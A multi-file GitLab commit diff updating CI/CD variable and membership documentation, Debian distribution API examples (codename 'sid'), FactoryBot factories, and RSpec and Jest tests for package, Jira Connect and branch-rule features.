> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8.
You can grant permission to override variables to users with the Maintainer role only. When other users try to run a pipeline
with overridden variables, they receive the `Insufficient permissions to set pipeline variables`
error message.
You can limit the ability to override variables to only users with the Maintainer role.
When other users try to run a pipeline with overridden variables, they receive the
`Insufficient permissions to set pipeline variables` error message.
Enable this feature by using [the projects API](../../api/projects.md#edit-project)
to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default.
If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file),
use this setting for control over the environment the pipeline runs in.
You can enable this feature by using [the projects API](../../api/projects.md#edit-project)
to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default.
## Related topics
- You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables
@ -683,13 +726,12 @@ in Bash or `dir env:` in PowerShell. This exposes the values of **all** availabl
variables, which can be a [security risk](#cicd-variable-security).
[Masked variables](#mask-a-cicd-variable) display as `[masked]`.
For example:
For example, with Bash:
```yaml
job_name:
script:
- export
# - 'dir env:' # Use this for PowerShell
```
Example job log output (truncated):
@ -733,7 +775,7 @@ Before you enable debug logging, make sure only team members
can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline)
with debug output before you make logs public again.
To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`:
To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`:
```yaml
job_name:

View File

@ -304,7 +304,7 @@ In GitLab 14.5 and later, you can also use:
- [Trigger variables](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule).
- [Manual pipeline run variables](../variables/index.md#override-a-variable-when-running-a-pipeline-manually).
- [Manual pipeline run variables](../pipelines/index.md#run-a-pipeline-manually).
- Pipeline [predefined variables](../variables/predefined_variables.md).
YAML files are parsed before the pipeline is created, so the following pipeline predefined variables

View File

@ -32,6 +32,8 @@ The `review-docs-deploy*` job triggers a cross project pipeline and builds the
docs site with your changes. When the pipeline finishes, the review app URL
appears in the merge request widget. Use it to navigate to your changes.
The `review-docs-cleanup` job is triggered automatically on merge. This job deletes the review app.
You must have the Developer role in the project. Users without the Developer role, such
as external contributors, cannot run the manual job. In that case, ask someone from
the GitLab team to run the job.

View File

@ -37,7 +37,7 @@ You can also [switch to an existing branch](start-using-git.md#switch-to-a-branc
if you have one already.
Using your standard tool for copying files (for example, Finder in macOS, or File Explorer
on Windows), put the file into a directory within the GitLab project.
on Windows), put the file into a directory in the GitLab project.
Check if your file is actually present in the directory (if you're on Windows,
use `dir` instead):

View File

@ -32,7 +32,5 @@ disqus_identifier: 'https://docs.gitlab.com/ee/workflow/workflow.html'
```
1. Review your code on commits page.
1. Create a merge request.
1. Your team lead reviews the code and merges it to the main branch.

View File

@ -82,12 +82,12 @@ To create a project-level distribution:
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/<project_id>/debian_distributions?codename=<codename>"
```
Example response with `codename=unstable`:
Example response with `codename=sid`:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,

View File

@ -95,6 +95,20 @@ in the `.gitlab/product_analytics/dashboards/` directory of a project repository
Project maintainers can enforce approval rules on dashboard changes using features such as code owners and approval rules. Dashboards are versioned in source control with the rest of a project's code.
### View project dashboards
> Introduced in GitLab 15.9 behind the [feature flag](../../administration/feature_flags.md) named `combined_analytics_dashboards`. Disabled by default.
FLAG:
On self-managed GitLab, by default this feature is not available. To make it available per project or for your entire instance, ask an administrator to [enable the feature flag](../../administration/feature_flags.md) named `combined_analytics_dashboards`.
On GitLab.com, this feature is not available.
This feature is not ready for production use.
To view a list of product analytics dashboards for a project:
1. On the top bar, select **Main menu > Projects** and find your project.
1. On the left sidebar, select **Analytics > Dashboards**.
### Define a dashboard
To define a dashboard:

View File

@ -67,6 +67,42 @@ If a user is:
- A direct member of a project, the **Expiration** and **Max role** fields can be updated directly on the project.
- An inherited member from a parent group, the **Expiration** and **Max role** fields must be updated on the parent group.
### Membership and visibility rights
Depending on their membership type, members of groups or projects are granted different visibility levels
and rights into the group or project.
| Action | Direct group member | Inherited group member | Direct shared group member | Inherited shared group member |
| --- | ------------------- | ---------------------- | -------------------------- | ----------------------------- |
| Generate boards | ✓ | ✓ | ✓ | ✓ |
| View issues of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| View labels of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| View milestones of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| Be shared into other groups | ✓ | | | |
| Be shared into other projects | ✓ | ✓ | | |
| Share the group with other members | ✓ | | | |
In the following example, `User` is a:
- Direct member of `subgroup`.
- Inherited member of `subsubgroup`.
- Indirect member of `subgroup-2` and `subgroup-3`.
- Indirect inherited member of `subsubgroup-2` and `subsubgroup-3`.
```mermaid
graph TD
classDef user stroke:green,color:green;
root --> subgroup --> subsubgroup
root-2 --> subgroup-2 --> subsubgroup-2
root-3 --> subgroup-3 --> subsubgroup-3
subgroup -. shared .-> subgroup-2 -. shared .-> subgroup-3
User-. member .- subgroup
class User user
```
## Add users to a project
> - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/247208) in GitLab 13.11 from a form to a modal window [with a flag](../../feature_flags.md). Disabled by default.

View File

@ -76,7 +76,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
post '/' do
@ -107,7 +107,7 @@ module API
params do
use :pagination
optional :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
optional :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
get '/' do
@ -132,7 +132,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
end
get '/:codename' do
authorize_read_package!(project_or_group)
@ -153,7 +153,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
end
get '/:codename/key.asc' do
authorize_read_package!(project_or_group)
@ -179,7 +179,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
put '/:codename' do
@ -210,7 +210,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
delete '/:codename' do

View File

@ -6,7 +6,7 @@ module API
module Debian
class Distribution < Grape::Entity
expose :id, documentation: { type: 'integer', example: 1 }
expose :codename, documentation: { type: 'string', example: 'unstable' }
expose :codename, documentation: { type: 'string', example: 'sid' }
expose :suite, documentation: { type: 'string', example: 'unstable' }
expose :origin, documentation: { type: 'string', example: 'Grep' }
expose :label, documentation: { type: 'string', example: 'grep.be' }

View File

@ -36,6 +36,7 @@ RSpec.describe Projects::CommitController do
go(id: commit.id)
expect(response).to be_ok
expect(assigns(:ref)).to eq commit.id
end
context 'when a pipeline job is running' do
@ -57,6 +58,7 @@ RSpec.describe Projects::CommitController do
go(id: commit.id.reverse)
expect(response).to be_not_found
expect(assigns(:ref)).to be_nil
end
end

View File

@ -4,22 +4,24 @@ FactoryBot.define do
factory :debian_project_distribution, class: 'Packages::Debian::ProjectDistribution' do
container { association(:project) }
sequence(:codename) { |n| "project-dist-#{n}" }
sequence(:codename) { |n| "#{FFaker::Lorem.word}#{n}" }
factory :debian_group_distribution, class: 'Packages::Debian::GroupDistribution' do
container { association(:group) }
end
sequence(:codename) { |n| "group-dist-#{n}" }
trait(:with_suite) do
sequence(:suite) { |n| "#{FFaker::Lorem.word}#{n}" }
end
trait(:with_file) do
file_signature do
<<~EOF
<<~FILESIGNATURE
-----BEGIN PGP SIGNATURE-----
ABC
-----BEGIN PGP SIGNATURE-----
EOF
FILESIGNATURE
end
after(:build) do |distribution, evaluator|

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_group_architecture, class: 'Packages::Debian::GroupArchitecture' do
distribution { association(:debian_group_distribution) }
sequence(:name) { |n| "group-arch-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_group_component, class: 'Packages::Debian::GroupComponent' do
distribution { association(:debian_group_distribution) }
sequence(:name) { |n| "group-component-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_project_architecture, class: 'Packages::Debian::ProjectArchitecture' do
distribution { association(:debian_project_distribution) }
sequence(:name) { |n| "project-arch-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_project_component, class: 'Packages::Debian::ProjectComponent' do
distribution { association(:debian_project_distribution) }
sequence(:name) { |n| "project-component-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -66,7 +66,7 @@ FactoryBot.define do
end
factory :debian_package do
sequence(:name) { |n| "package-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
sequence(:version) { |n| "1.0-#{n}" }
package_type { :debian }

View File

@ -961,8 +961,8 @@ RSpec.describe 'File blob', :js, feature_category: :projects do
end
it 'renders sandboxed iframe' do
expected = %(<iframe src="/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000">)
expect(page.html).to include(expected)
expected = %(iframe[src$="/-/sandbox/swagger"][sandbox="allow-scripts allow-popups allow-forms"][frameborder="0"][width="100%"][height="1000"])
expect(page).to have_css(expected)
end
end
end

View File

@ -1,5 +1,6 @@
import axios from 'axios';
import MockAdapter from 'axios-mock-adapter';
import { TEST_HOST } from 'helpers/test_constants';
import { setHTMLFixture, resetHTMLFixture } from 'helpers/fixtures';
import renderOpenApi from '~/blob/openapi';
import { HTTP_STATUS_OK } from '~/lib/utils/http_status';
@ -22,7 +23,7 @@ describe('OpenAPI blob viewer', () => {
it('initializes SwaggerUI with the correct configuration', () => {
expect(document.body.innerHTML).toContain(
'<iframe src="/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000"></iframe>',
`<iframe src="${TEST_HOST}/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000"></iframe>`,
);
});
});

View File

@ -12,7 +12,11 @@ describe('SignInPage', () => {
const findSignInGitlabCom = () => wrapper.findComponent(SignInGitlabCom);
const findSignInGitabMultiversion = () => wrapper.findComponent(SignInGitlabMultiversion);
const createComponent = ({ props = {}, jiraConnectOauthEnabled } = {}) => {
const createComponent = ({
props = {},
jiraConnectOauthEnabled,
publicKeyStorageEnabled,
} = {}) => {
store = createStore();
wrapper = shallowMount(SignInPage, {
@ -22,7 +26,11 @@ describe('SignInPage', () => {
jiraConnectOauth: jiraConnectOauthEnabled,
},
},
propsData: { hasSubscriptions: false, ...props },
propsData: {
hasSubscriptions: false,
publicKeyStorageEnabled,
...props,
},
});
};
@ -31,15 +39,20 @@ describe('SignInPage', () => {
});
it.each`
jiraConnectOauthEnabled | shouldRenderDotCom | shouldRenderMultiversion
${false} | ${true} | ${false}
${false} | ${true} | ${false}
${true} | ${false} | ${true}
${true} | ${false} | ${true}
jiraConnectOauthEnabled | publicKeyStorageEnabled | shouldRenderDotCom | shouldRenderMultiversion
${false} | ${true} | ${true} | ${false}
${false} | ${false} | ${true} | ${false}
${true} | ${true} | ${false} | ${true}
${true} | ${false} | ${true} | ${false}
`(
'renders correct component when jiraConnectOauth is $jiraConnectOauthEnabled',
({ jiraConnectOauthEnabled, shouldRenderDotCom, shouldRenderMultiversion }) => {
createComponent({ jiraConnectOauthEnabled });
({
jiraConnectOauthEnabled,
publicKeyStorageEnabled,
shouldRenderDotCom,
shouldRenderMultiversion,
}) => {
createComponent({ jiraConnectOauthEnabled, publicKeyStorageEnabled });
expect(findSignInGitlabCom().exists()).toBe(shouldRenderDotCom);
expect(findSignInGitabMultiversion().exists()).toBe(shouldRenderMultiversion);

View File

@ -1,23 +1,21 @@
import Vue from 'vue';
import VueApollo from 'vue-apollo';
import * as util from '~/lib/utils/url_utility';
import { shallowMountExtended } from 'helpers/vue_test_utils_helper';
import createMockApollo from 'helpers/mock_apollo_helper';
import waitForPromises from 'helpers/wait_for_promises';
import { shallowMountExtended } from 'helpers/vue_test_utils_helper';
import RuleView from '~/projects/settings/branch_rules/components/view/index.vue';
import Protection from '~/projects/settings/branch_rules/components/view/protection.vue';
import {
I18N,
ALL_BRANCHES_WILDCARD,
} from '~/projects/settings/branch_rules/components/view/constants';
import Protection from '~/projects/settings/branch_rules/components/view/protection.vue';
import branchRulesQuery from '~/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import branchRulesQuery from 'ee_else_ce/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import { sprintf } from '~/locale';
import {
branchProtectionsMockResponse,
approvalRulesMock,
statusChecksRulesMock,
matchingBranchesCount,
} from './mock_data';
} from 'ee_else_ce_jest/projects/settings/branch_rules/components/view/mock_data';
jest.mock('~/lib/utils/url_utility', () => ({
getParameterByName: jest.fn().mockReturnValue('main'),
@ -29,18 +27,18 @@ Vue.use(VueApollo);
const protectionMockProps = {
headerLinkHref: 'protected/branches',
headerLinkTitle: 'Manage in protected branches',
roles: [{ accessLevelDescription: 'Maintainers' }],
users: [{ avatarUrl: 'test.com/user.png', name: 'peter', webUrl: 'test.com' }],
headerLinkTitle: I18N.manageProtectionsLinkTitle,
};
const roles = [
{ accessLevelDescription: 'Maintainers' },
{ accessLevelDescription: 'Maintainers + Developers' },
];
describe('View branch rules', () => {
let wrapper;
let fakeApollo;
const projectPath = 'test/testing';
const protectedBranchesPath = 'protected/branches';
const approvalRulesPath = 'approval/rules';
const statusChecksPath = 'status/checks';
const branchProtectionsMockRequestHandler = jest
.fn()
.mockResolvedValue(branchProtectionsMockResponse);
@ -50,7 +48,8 @@ describe('View branch rules', () => {
wrapper = shallowMountExtended(RuleView, {
apolloProvider: fakeApollo,
provide: { projectPath, protectedBranchesPath, approvalRulesPath, statusChecksPath },
provide: { projectPath, protectedBranchesPath },
stubs: { Protection },
});
await waitForPromises();
@ -106,41 +105,53 @@ describe('View branch rules', () => {
it('renders a branch protection component for push rules', () => {
expect(findBranchProtections().at(0).props()).toMatchObject({
header: sprintf(I18N.allowedToPushHeader, { total: 2 }),
header: sprintf(I18N.allowedToPushHeader, {
total: 2,
}),
...protectionMockProps,
});
});
it('passes expected roles for push rules via props', () => {
findBranchProtections()
.at(0)
.props()
.roles.forEach((role, i) => {
expect(role).toMatchObject({
accessLevelDescription: roles[i].accessLevelDescription,
});
});
});
it('renders force push protection', () => {
expect(findForcePushTitle().exists()).toBe(true);
});
it('renders a branch protection component for merge rules', () => {
expect(findBranchProtections().at(1).props()).toMatchObject({
header: sprintf(I18N.allowedToMergeHeader, { total: 2 }),
header: sprintf(I18N.allowedToMergeHeader, {
total: 2,
}),
...protectionMockProps,
});
});
it('renders a branch protection component for approvals', () => {
expect(findApprovalsTitle().exists()).toBe(true);
expect(findBranchProtections().at(2).props()).toMatchObject({
header: sprintf(I18N.approvalsHeader, { total: 3 }),
headerLinkHref: approvalRulesPath,
headerLinkTitle: I18N.manageApprovalsLinkTitle,
approvals: approvalRulesMock,
});
it('passes expected roles form merge rules via props', () => {
findBranchProtections()
.at(1)
.props()
.roles.forEach((role, i) => {
expect(role).toMatchObject({
accessLevelDescription: roles[i].accessLevelDescription,
});
});
});
it('renders a branch protection component for status checks', () => {
expect(findStatusChecksTitle().exists()).toBe(true);
it('does not render a branch protection component for approvals', () => {
expect(findApprovalsTitle().exists()).toBe(false);
});
expect(findBranchProtections().at(3).props()).toMatchObject({
header: sprintf(I18N.statusChecksHeader, { total: 2 }),
headerLinkHref: statusChecksPath,
headerLinkTitle: I18N.statusChecksLinkTitle,
statusChecks: statusChecksRulesMock,
});
it('does not render a branch protection component for status checks', () => {
expect(findStatusChecksTitle().exists()).toBe(false);
});
});

View File

@ -85,16 +85,8 @@ export const accessLevelsMockResponse = [
__typename: 'PushAccessLevelEdge',
node: {
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Jona Langworth',
group: null,
user: {
__typename: 'UserCore',
id: '123',
webUrl: 'test.com',
name: 'peter',
avatarUrl: 'test.com/user.png',
},
accessLevel: 30,
accessLevelDescription: 'Maintainers',
},
},
{
@ -102,9 +94,7 @@ export const accessLevelsMockResponse = [
node: {
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Maintainers',
group: null,
user: null,
accessLevelDescription: 'Maintainers + Developers',
},
},
];
@ -122,10 +112,10 @@ export const branchProtectionsMockResponse = {
{
__typename: 'BranchRule',
name: 'main',
matchingBranchesCount,
branchProtection: {
__typename: 'BranchProtection',
allowForcePush: true,
codeOwnerApprovalRequired: true,
mergeAccessLevels: {
__typename: 'MergeAccessLevelConnection',
edges: accessLevelsMockResponse,
@ -135,41 +125,23 @@ export const branchProtectionsMockResponse = {
edges: accessLevelsMockResponse,
},
},
approvalRules: {
__typename: 'ApprovalProjectRuleConnection',
nodes: approvalRulesMock,
},
externalStatusChecks: {
__typename: 'ExternalStatusCheckConnection',
nodes: statusChecksRulesMock,
},
matchingBranchesCount,
},
{
__typename: 'BranchRule',
name: '*',
matchingBranchesCount,
branchProtection: {
__typename: 'BranchProtection',
allowForcePush: true,
codeOwnerApprovalRequired: true,
mergeAccessLevels: {
__typename: 'MergeAccessLevelConnection',
edges: [],
edges: accessLevelsMockResponse,
},
pushAccessLevels: {
__typename: 'PushAccessLevelConnection',
edges: [],
edges: accessLevelsMockResponse,
},
},
approvalRules: {
__typename: 'ApprovalProjectRuleConnection',
nodes: [],
},
externalStatusChecks: {
__typename: 'ExternalStatusCheckConnection',
nodes: [],
},
matchingBranchesCount,
},
],
},

View File

@ -47,11 +47,7 @@ export const pushAccessLevelsMockResult = {
groups: [],
roles: [
{
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Maintainers',
group: null,
user: null,
},
],
};

View File

@ -11,6 +11,7 @@ RSpec.describe GitlabSchema.types['WorkItem'] do
it 'has specific fields' do
fields = %i[
author
confidential
description
description_html

View File

@ -9,6 +9,7 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
let(:user) { create(:user) }
let(:client_id) { '123' }
let(:enable_public_keys_storage) { false }
before do
stub_application_setting(jira_connect_application_key: client_id)
@ -19,7 +20,8 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
context 'user is not logged in' do
before do
allow(view).to receive(:current_user).and_return(nil)
allow(Gitlab).to receive_message_chain('config.gitlab.url') { 'http://test.host' }
allow(Gitlab.config.gitlab).to receive(:url).and_return('http://test.host')
allow(Gitlab.config.jira_connect).to receive(:enable_public_keys_storage).and_return(enable_public_keys_storage)
end
it 'includes Jira Connect app attributes' do
@ -98,6 +100,18 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
it 'assigns gitlab_user_path to nil' do
expect(subject[:gitlab_user_path]).to be_nil
end
it 'assignes public_key_storage_enabled to false' do
expect(subject[:public_key_storage_enabled]).to eq(false)
end
context 'when public_key_storage is enabled' do
let(:enable_public_keys_storage) { true }
it 'assignes public_key_storage_enabled to true' do
expect(subject[:public_key_storage_enabled]).to eq(true)
end
end
end
context 'user is logged in' do

View File

@ -2,16 +2,16 @@
require 'spec_helper'
RSpec.describe '5-Minute-Production-App.gitlab-ci.yml' do
RSpec.describe '5-Minute-Production-App.gitlab-ci.yml', feature_category: :five_minute_production_app do
subject(:template) { Gitlab::Template::GitlabCiYmlTemplate.find('5-Minute-Production-App') }
describe 'the created pipeline' do
let_it_be(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let_it_be_with_refind(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let(:user) { project.first_owner }
let(:default_branch) { 'master' }
let(:pipeline_branch) { default_branch }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch ) }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch) }
let(:pipeline) { service.execute(:push).payload }
let(:build_names) { pipeline.builds.pluck(:name) }
@ -24,24 +24,27 @@ RSpec.describe '5-Minute-Production-App.gitlab-ci.yml' do
end
context 'when AWS variables are set' do
def create_ci_variable(key, value)
create(:ci_variable, project: project, key: key, value: value)
end
before do
create(:ci_variable, project: project, key: 'AWS_ACCESS_KEY_ID', value: 'AKIAIOSFODNN7EXAMPLE')
create(:ci_variable, project: project, key: 'AWS_SECRET_ACCESS_KEY', value: 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY')
create(:ci_variable, project: project, key: 'AWS_DEFAULT_REGION', value: 'us-west-2')
create_ci_variable('AWS_ACCESS_KEY_ID', 'AKIAIOSFODNN7EXAMPLE')
create_ci_variable('AWS_SECRET_ACCESS_KEY', 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY')
create_ci_variable('AWS_DEFAULT_REGION', 'us-west-2')
end
it 'creates all jobs' do
expect(build_names).to match_array(%w(build terraform_apply deploy terraform_destroy))
expect(build_names).to match_array(%w[build terraform_apply deploy terraform_destroy])
end
context 'pipeline branch is protected' do
context 'when pipeline branch is protected' do
before do
create(:protected_branch, project: project, name: pipeline_branch)
project.reload
end
it 'does not create a destroy job' do
expect(build_names).to match_array(%w(build terraform_apply deploy))
expect(build_names).to match_array(%w[build terraform_apply deploy])
end
end
end

View File

@ -33,6 +33,26 @@ RSpec.describe Packages::Package, type: :model, feature_category: :package_regis
it { is_expected.to contain_exactly(publication.package) }
end
describe '.with_debian_codename_or_suite' do
let_it_be(:distribution1) { create(:debian_project_distribution, :with_suite) }
let_it_be(:distribution2) { create(:debian_project_distribution, :with_suite) }
let_it_be(:package1) { create(:debian_package, published_in: distribution1) }
let_it_be(:package2) { create(:debian_package, published_in: distribution2) }
context 'with a codename' do
subject { described_class.with_debian_codename_or_suite(distribution1.codename).to_a }
it { is_expected.to contain_exactly(package1) }
end
context 'with a suite' do
subject { described_class.with_debian_codename_or_suite(distribution2.suite).to_a }
it { is_expected.to contain_exactly(package2) }
end
end
describe '.with_composer_target' do
let!(:package1) { create(:composer_package, :with_metadatum, sha: '123') }
let!(:package2) { create(:composer_package, :with_metadatum, sha: '123') }

View File

@ -8,6 +8,7 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, :repository, :public, group: group) }
let_it_be(:current_user) { create(:user) }
let_it_be(:reporter) { create(:user).tap { |reporter| project.add_reporter(reporter) } }
let_it_be(:label1) { create(:label, project: project) }
let_it_be(:label2) { create(:label, project: project) }
let_it_be(:milestone1) { create(:milestone, project: project) }
@ -43,10 +44,10 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
end
shared_examples 'work items resolver without N + 1 queries' do
it 'avoids N+1 queries' do
it 'avoids N+1 queries', :use_sql_query_cache do
post_graphql(query, current_user: current_user) # warm-up
control = ActiveRecord::QueryRecorder.new do
control = ActiveRecord::QueryRecorder.new(skip_cached: false) do
post_graphql(query, current_user: current_user)
end
@ -59,11 +60,12 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
last_edited_at: 1.week.ago,
project: project,
labels: [label1, label2],
milestone: milestone2
milestone: milestone2,
author: reporter
)
expect { post_graphql(query, current_user: current_user) }.not_to exceed_all_query_limit(control)
expect_graphql_errors_to_be_empty
expect { post_graphql(query, current_user: current_user) }.not_to exceed_query_limit(control)
end
end

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::CreateDistributionService do
RSpec.describe Packages::Debian::CreateDistributionService, feature_category: :package_registry do
RSpec.shared_examples 'Create Debian Distribution' do |expected_message, expected_components, expected_architectures|
let_it_be(:container) { create(container_type) } # rubocop:disable Rails/SaveBang

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::CreatePackageFileService do
RSpec.describe Packages::Debian::CreatePackageFileService, feature_category: :package_registry do
include WorkhorseHelpers
let_it_be(:package) { create(:debian_incoming, without_package_files: true) }

View File

@ -1,10 +1,9 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractChangesMetadataService do
RSpec.describe Packages::Debian::ExtractChangesMetadataService, feature_category: :package_registry do
describe '#execute' do
let_it_be(:distribution) { create(:debian_project_distribution, codename: 'unstable') }
let_it_be(:incoming) { create(:debian_incoming, project: distribution.project) }
let_it_be(:incoming) { create(:debian_incoming) }
let(:source_file) { incoming.package_files.first }
let(:dsc_file) { incoming.package_files.second }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractDebMetadataService do
RSpec.describe Packages::Debian::ExtractDebMetadataService, feature_category: :package_registry do
subject { described_class.new(file_path) }
let(:file_name) { 'libsample0_1.2.3~alpha2_amd64.deb' }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractMetadataService do
RSpec.describe Packages::Debian::ExtractMetadataService, feature_category: :package_registry do
let(:service) { described_class.new(package_file) }
subject { service.execute }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::FindOrCreateIncomingService do
RSpec.describe Packages::Debian::FindOrCreateIncomingService, feature_category: :package_registry do
let_it_be(:project) { create(:project) }
let_it_be(:user) { create(:user) }

View File

@ -2,54 +2,57 @@
require 'spec_helper'
RSpec.describe Packages::Debian::FindOrCreatePackageService do
let_it_be(:distribution) { create(:debian_project_distribution) }
RSpec.describe Packages::Debian::FindOrCreatePackageService, feature_category: :package_registry do
let_it_be(:distribution) { create(:debian_project_distribution, :with_suite) }
let_it_be(:project) { distribution.project }
let_it_be(:user) { create(:user) }
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.codename } }
let(:service) { described_class.new(project, user, params) }
subject(:service) { described_class.new(project, user, params) }
let(:package) { subject.payload[:package] }
let(:package2) { service.execute.payload[:package] }
shared_examples 'find or create Debian package' do
it 'returns the same object' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect(subject).to be_success
expect(package).to be_valid
expect(package.project_id).to eq(project.id)
expect(package.creator_id).to eq(user.id)
expect(package.name).to eq('foo')
expect(package.version).to eq('1.0+debian')
expect(package).to be_debian
expect(package.debian_publication.distribution).to eq(distribution)
expect { package2 }.not_to change { ::Packages::Package.count }
expect(package2.id).to eq(package.id)
end
context 'with package marked as pending_destruction' do
it 'creates a new package' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
package.pending_destruction!
expect { package2 }.to change { ::Packages::Package.count }.by(1)
expect(package2.id).not_to eq(package.id)
end
end
end
describe '#execute' do
subject { service.execute }
let(:package) { subject.payload[:package] }
context 'with a codename as distribution name' do
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.codename } }
context 'run once' do
it 'creates a new package', :aggregate_failures do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect(subject).to be_success
expect(package).to be_valid
expect(package.project_id).to eq(project.id)
expect(package.creator_id).to eq(user.id)
expect(package.name).to eq('foo')
expect(package.version).to eq('1.0+debian')
expect(package).to be_debian
expect(package.debian_publication.distribution).to eq(distribution)
end
it_behaves_like 'find or create Debian package'
end
context 'run twice' do
let(:package2) { service.execute.payload[:package] }
context 'with a suite as distribution name' do
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.suite } }
it 'returns the same object' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect { package2 }.not_to change { ::Packages::Package.count }
expect(package2.id).to eq(package.id)
end
context 'with package marked as pending_destruction' do
it 'creates a new package' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
package.pending_destruction!
expect { package2 }.to change { ::Packages::Package.count }.by(1)
expect(package2.id).not_to eq(package.id)
end
end
it_behaves_like 'find or create Debian package'
end
context 'with non-existing distribution' do

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::GenerateDistributionKeyService do
RSpec.describe Packages::Debian::GenerateDistributionKeyService, feature_category: :package_registry do
let(:params) { {} }
subject { described_class.new(params: params) }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ParseDebian822Service do
RSpec.describe Packages::Debian::ParseDebian822Service, feature_category: :package_registry do
subject { described_class.new(input) }
context 'with dpkg-deb --field output' do

View File

@ -1,14 +1,14 @@
# frozen_string_literal: true
